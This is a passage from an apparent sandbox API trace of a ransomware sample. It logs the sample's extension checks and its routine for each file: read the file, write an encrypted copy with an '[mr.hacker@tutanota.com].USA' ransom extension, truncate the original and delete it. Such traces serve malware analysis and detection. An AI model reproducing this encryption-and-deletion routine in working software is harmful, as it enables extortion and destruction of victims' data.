(lpString=".doc") returned 4 [0269.428] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.428] lstrlenW (lpString=".docx") returned 5 [0269.428] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.428] lstrlenW (lpString=".pdf") returned 4 [0269.428] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.428] lstrlenW (lpString=".xls") returned 4 [0269.428] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.428] lstrlenW (lpString=".xlsx") returned 5 [0269.428] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.428] lstrlenW (lpString=".ppt") returned 4 [0269.428] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63 [0269.428] lstrlenW (lpString=".zip") returned 4 [0269.428] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.428] lstrlenW (lpString=".rar") returned 4 [0269.428] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.429] lstrlenW (lpString=".bz2") returned 4 [0269.429] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.429] lstrlenW (lpString=".7z") returned 3 [0269.429] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63 [0269.429] lstrlenW (lpString=".dbf") returned 4 [0269.429] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63 [0269.429] lstrlenW (lpString=".1cd") returned 4 [0269.429] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63 [0269.429] lstrlenW (lpString=".jpg") returned 4 [0269.429] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63 [0269.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63 [0269.429] lstrlenW (lpString=".doc") returned 4 [0269.429] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.429] lstrlenW (lpString=".docx") returned 5 [0269.429] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.429] lstrlenW (lpString=".pdf") returned 4 [0269.429] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.429] lstrlenW (lpString=".xls") returned 4 [0269.429] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.429] lstrlenW (lpString=".xlsx") returned 5 [0269.429] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.429] lstrlenW (lpString=".ppt") returned 4 [0269.429] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.430] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63 [0269.430] lstrlenW (lpString=".zip") returned 4 [0269.430] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.430] lstrlenW (lpString=".rar") returned 4 [0269.430] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.430] lstrlenW (lpString=".bz2") returned 4 [0269.430] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.430] lstrlenW (lpString=".7z") returned 3 [0269.430] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.430] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63 [0269.430] lstrlenW (lpString=".dbf") returned 4 [0269.430] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.430] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63 [0269.430] lstrlenW (lpString=".1cd") returned 4 [0269.430] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.430] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63 [0269.430] lstrlenW (lpString=".jpg") returned 4 [0269.430] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.430] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0269.430] lstrlenW (lpString="DD01168_.WMF") returned 12 [0269.430] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01168_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0269.431] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=2004) returned 1 [0269.431] CloseHandle (hObject=0x3ac) returned 1 [0269.431] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01168_.wmf")) returned 0x20 [0269.431] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01168_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.431] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01168_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0269.431] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.431] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.431] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01168_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0269.432] GetLastError () returned 0x0 [0269.432] ReadFile (in: hFile=0x3ac, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x7d4, lpOverlapped=0x0) returned 1 [0269.435] WriteFile (in: hFile=0x3b0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x7e0, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x7e0, lpOverlapped=0x0) returned 1 [0269.436] ReadFile (in: hFile=0x3ac, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.436] WriteFile (in: hFile=0x3b0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.436] SetEndOfFile (hFile=0x3b0) returned 1 [0269.436] CloseHandle (hObject=0x3b0) returned 1 [0269.436] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.436] SetEndOfFile (hFile=0x3ac) returned 1 [0269.439] CloseHandle (hObject=0x3ac) returned 1 [0269.439] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.439] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01168_.wmf")) returned 1 [0269.440] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63 [0269.440] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63 [0269.440] lstrlenW (lpString=".doc") returned 4 [0269.440] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.440] lstrlenW (lpString=".docx") returned 5 [0269.440] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.440] lstrlenW (lpString=".pdf") returned 4 [0269.440] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.440] lstrlenW (lpString=".xls") returned 4 [0269.440] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.440] lstrlenW (lpString=".xlsx") returned 5 [0269.440] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.440] lstrlenW (lpString=".ppt") returned 4 [0269.440] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.440] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63 [0269.440] lstrlenW (lpString=".zip") returned 4 [0269.440] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.440] lstrlenW (lpString=".rar") returned 4 [0269.440] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.440] lstrlenW (lpString=".bz2") returned 4 [0269.440] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.440] lstrlenW (lpString=".7z") returned 3 [0269.440] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.440] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63 [0269.440] lstrlenW (lpString=".dbf") returned 4 [0269.440] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.440] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63 [0269.440] lstrlenW (lpString=".1cd") returned 4 [0269.440] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63 [0269.441] lstrlenW (lpString=".jpg") returned 4 [0269.441] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63 [0269.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63 [0269.441] lstrlenW (lpString=".doc") returned 4 [0269.441] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.441] lstrlenW (lpString=".docx") returned 5 [0269.441] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.441] lstrlenW (lpString=".pdf") returned 4 [0269.441] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.441] lstrlenW (lpString=".xls") returned 4 [0269.441] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.441] lstrlenW (lpString=".xlsx") returned 5 [0269.441] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.441] lstrlenW (lpString=".ppt") returned 4 [0269.441] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63 [0269.441] lstrlenW (lpString=".zip") returned 4 [0269.441] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.441] lstrlenW (lpString=".rar") returned 4 [0269.441] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.441] lstrlenW (lpString=".bz2") returned 4 [0269.441] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.441] lstrlenW (lpString=".7z") returned 3 [0269.441] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63 [0269.442] lstrlenW (lpString=".dbf") returned 4 [0269.442] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63 [0269.442] lstrlenW (lpString=".1cd") returned 4 [0269.442] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63 [0269.442] lstrlenW (lpString=".jpg") returned 4 [0269.442] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.442] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0269.442] lstrlenW (lpString="DD01169_.WMF") returned 12 [0269.442] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01169_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0269.443] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=2020) returned 1 [0269.443] CloseHandle (hObject=0x3ac) returned 1 [0269.443] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01169_.wmf")) returned 0x20 [0269.443] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01169_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.444] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01169_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0269.444] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.444] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.444] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01169_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0269.444] GetLastError () returned 0x0 [0269.444] ReadFile (in: hFile=0x3ac, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x7e4, lpOverlapped=0x0) returned 1 [0269.446] WriteFile (in: hFile=0x3b0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x7f0, lpOverlapped=0x0) returned 1 [0269.446] ReadFile (in: hFile=0x3ac, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.446] WriteFile (in: hFile=0x3b0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.446] SetEndOfFile (hFile=0x3b0) returned 1 [0269.446] CloseHandle (hObject=0x3b0) returned 1 [0269.446] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.447] SetEndOfFile (hFile=0x3ac) returned 1 [0269.449] CloseHandle (hObject=0x3ac) returned 1 [0269.449] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.450] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01169_.wmf")) returned 1 [0269.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63 [0269.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63 [0269.450] lstrlenW (lpString=".doc") returned 4 [0269.450] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.450] lstrlenW (lpString=".docx") returned 5 [0269.450] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.450] lstrlenW (lpString=".pdf") returned 4 [0269.450] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.450] lstrlenW (lpString=".xls") returned 4 [0269.450] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.450] lstrlenW (lpString=".xlsx") returned 5 [0269.450] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.450] lstrlenW (lpString=".ppt") returned 4 [0269.450] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63 [0269.450] lstrlenW (lpString=".zip") returned 4 [0269.450] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.450] lstrlenW (lpString=".rar") returned 4 [0269.450] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.450] lstrlenW (lpString=".bz2") returned 4 [0269.450] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.450] lstrlenW (lpString=".7z") returned 3 [0269.450] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63 [0269.451] lstrlenW (lpString=".dbf") returned 4 [0269.451] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63 [0269.451] lstrlenW (lpString=".1cd") returned 4 [0269.451] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63 [0269.451] lstrlenW (lpString=".jpg") returned 4 [0269.451] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63 [0269.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63 [0269.451] lstrlenW (lpString=".doc") returned 4 [0269.451] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.451] lstrlenW (lpString=".docx") returned 5 [0269.451] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.451] lstrlenW (lpString=".pdf") returned 4 [0269.451] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.451] lstrlenW (lpString=".xls") returned 4 [0269.451] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.451] lstrlenW (lpString=".xlsx") returned 5 [0269.451] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.815] lstrlenW (lpString=".ppt") returned 4 [0269.815] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63 [0269.816] lstrlenW (lpString=".zip") returned 4 [0269.816] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.816] lstrlenW (lpString=".rar") returned 4 [0269.816] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.816] lstrlenW (lpString=".bz2") returned 4 [0269.816] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.816] lstrlenW (lpString=".7z") returned 3 [0269.816] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63 [0269.816] lstrlenW (lpString=".dbf") returned 4 [0269.816] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63 [0269.816] lstrlenW (lpString=".1cd") returned 4 [0269.816] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63 [0269.816] lstrlenW (lpString=".jpg") returned 4 [0269.816] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.816] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0269.816] lstrlenW (lpString="DD01172_.WMF") returned 12 [0269.816] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01172_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0269.878] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=2232) returned 1 [0269.879] CloseHandle (hObject=0x3a4) returned 1 [0269.879] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01172_.wmf")) returned 0x20 [0269.937] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01172_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.001] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01172_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0270.001] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.001] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.002] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01172_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0270.002] GetLastError () returned 0x0 [0270.003] ReadFile (in: hFile=0x3a4, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x8b8, lpOverlapped=0x0) returned 1 [0270.004] WriteFile (in: hFile=0x328, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x8c0, lpOverlapped=0x0) returned 1 [0270.005] ReadFile (in: hFile=0x3a4, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.005] WriteFile (in: hFile=0x328, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.005] SetEndOfFile (hFile=0x328) returned 1 [0270.005] CloseHandle (hObject=0x328) returned 1 [0270.005] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.005] SetEndOfFile (hFile=0x3a4) returned 1 [0270.007] CloseHandle (hObject=0x3a4) returned 1 [0270.007] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.008] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01172_.wmf")) returned 1 [0270.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63 [0270.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63 [0270.008] lstrlenW (lpString=".doc") returned 4 [0270.008] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.008] lstrlenW (lpString=".docx") returned 5 [0270.008] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.008] lstrlenW (lpString=".pdf") returned 4 [0270.008] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.008] lstrlenW (lpString=".xls") returned 4 [0270.008] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.008] lstrlenW (lpString=".xlsx") returned 5 [0270.008] lstrcmpiW (lpString1=".xlsx", 